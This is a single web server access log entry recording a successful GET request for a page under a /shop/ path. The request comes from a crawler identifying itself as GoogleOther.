66.249.73.162 - - [28/Apr/2026:07:37:02 +0300] "GET /shop/venerably/indenizening80429629721.html HTTP/1.1" 200 29818 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
